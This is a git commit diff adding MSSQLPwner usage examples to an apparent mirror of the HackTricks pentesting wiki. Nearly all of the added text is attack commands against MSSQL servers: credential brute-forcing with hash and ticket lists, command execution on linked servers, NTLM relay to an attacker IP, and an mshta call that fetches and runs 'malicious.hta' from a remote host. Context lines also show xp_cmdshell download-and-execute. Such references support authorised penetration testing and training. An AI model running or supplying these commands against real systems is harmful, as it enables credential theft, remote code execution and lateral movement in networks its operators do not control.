mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 21:53:54 +00:00
Adding MSSQLPwner
This commit is contained in:
parent
f9f40d7b95
commit
658dc074a7
4 changed files with 151 additions and 0 deletions
|
@ -287,10 +287,30 @@ legba mongodb --target localhost:27017 --username root --password data/passwords
|
||||||
|
|
||||||
### MSSQL
|
### MSSQL
|
||||||
|
|
||||||
|
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
|
||||||
|
```shell
|
||||||
|
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
|
||||||
|
|
||||||
|
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
|
||||||
|
|
||||||
|
# Bruteforce using tickets against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
|
||||||
|
|
||||||
|
# Bruteforce using passwords against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
|
||||||
|
|
||||||
|
# Bruteforce using hashes against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
|
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### MySQL
|
### MySQL
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
|
|
@ -90,6 +90,25 @@ msf> use windows/manage/mssql_local_auth_bypass
|
||||||
|
|
||||||
#### Login
|
#### Login
|
||||||
|
|
||||||
|
|
||||||
|
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
|
||||||
|
```shell
|
||||||
|
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
|
||||||
|
|
||||||
|
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
|
||||||
|
|
||||||
|
# Bruteforce using tickets against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
|
||||||
|
|
||||||
|
# Bruteforce using passwords against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
|
||||||
|
|
||||||
|
# Bruteforce using hashes against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
|
||||||
|
```
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
# Using Impacket mssqlclient.py
|
# Using Impacket mssqlclient.py
|
||||||
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
|
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
|
||||||
|
@ -232,6 +251,21 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1
|
||||||
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
|
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
|
||||||
```
|
```
|
||||||
|
|
||||||
|
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
|
||||||
|
```shell
|
||||||
|
# Executing custom assembly on the current server with windows authentication and executing hostname command
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
|
||||||
|
|
||||||
|
# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
|
||||||
|
|
||||||
|
# Executing the hostname command using stored procedures on the linked SRV01 server
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
|
||||||
|
|
||||||
|
# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
|
||||||
|
```
|
||||||
|
|
||||||
### Steal NetNTLM hash / Relay attack
|
### Steal NetNTLM hash / Relay attack
|
||||||
|
|
||||||
You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example).
|
You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example).
|
||||||
|
@ -248,6 +282,19 @@ sudo impacket-smbserver share ./ -smb2support
|
||||||
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
|
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
|
||||||
```
|
```
|
||||||
|
|
||||||
|
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
|
||||||
|
|
||||||
|
```shell
|
||||||
|
# Issuing NTLM relay attack on the SRV01 server
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
|
||||||
|
|
||||||
|
# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
|
||||||
|
|
||||||
|
# Issuing NTLM relay attack on the local server with custom command
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
|
||||||
|
```
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
You can check if who (apart sysadmins) has permissions to run those MSSQL functions with:
|
You can check if who (apart sysadmins) has permissions to run those MSSQL functions with:
|
||||||
|
|
||||||
|
|
|
@ -21,6 +21,76 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
|
||||||
|
|
||||||
## **MSSQL Enumeration / Discovery**
|
## **MSSQL Enumeration / Discovery**
|
||||||
|
|
||||||
|
### Python
|
||||||
|
The [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) tool is based on impacket, and allows also authenticate using kerberos tickets, and attack through link chains
|
||||||
|
|
||||||
|
<figure><img src="https://raw.githubusercontent.com/ScorpionesLabs/MSSqlPwner/main/assets/interractive.png"></figure>
|
||||||
|
|
||||||
|
```shell
|
||||||
|
# Interactive mode
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
|
||||||
|
|
||||||
|
# Interactive mode with 2 depth level of impersonations
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive
|
||||||
|
|
||||||
|
|
||||||
|
# Executing custom assembly on the current server with windows authentication and executing hostname command
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
|
||||||
|
|
||||||
|
# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
|
||||||
|
|
||||||
|
# Executing the hostname command using stored procedures on the linked SRV01 server
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
|
||||||
|
|
||||||
|
# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
|
||||||
|
|
||||||
|
# Issuing NTLM relay attack on the SRV01 server
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
|
||||||
|
|
||||||
|
# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
|
||||||
|
|
||||||
|
# Issuing NTLM relay attack on the local server with custom command
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
|
||||||
|
|
||||||
|
# Executing direct query
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"
|
||||||
|
|
||||||
|
# Retrieving password from the linked server DC01
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password
|
||||||
|
|
||||||
|
# Execute code using custom assembly on the linked server DC01
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll
|
||||||
|
|
||||||
|
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
|
||||||
|
|
||||||
|
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
|
||||||
|
|
||||||
|
# Bruteforce using tickets against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
|
||||||
|
|
||||||
|
# Bruteforce using passwords against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
|
||||||
|
|
||||||
|
# Bruteforce using hashes against the hosts listed on the hosts.txt
|
||||||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Enumerating from the network without domain session
|
||||||
|
|
||||||
|
```
|
||||||
|
# Interactive mode
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
### Powershell
|
||||||
|
|
||||||
The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.
|
The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
|
|
@ -92,6 +92,20 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S
|
||||||
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
|
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
|
||||||
|
|
||||||
|
```shell
|
||||||
|
# Issuing NTLM relay attack on the SRV01 server
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
|
||||||
|
|
||||||
|
# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
|
||||||
|
|
||||||
|
# Issuing NTLM relay attack on the local server with custom command
|
||||||
|
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
|
Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
|
||||||
|
|
||||||
### Certutil
|
### Certutil
|
||||||
|
|
Loading…
Reference in a new issue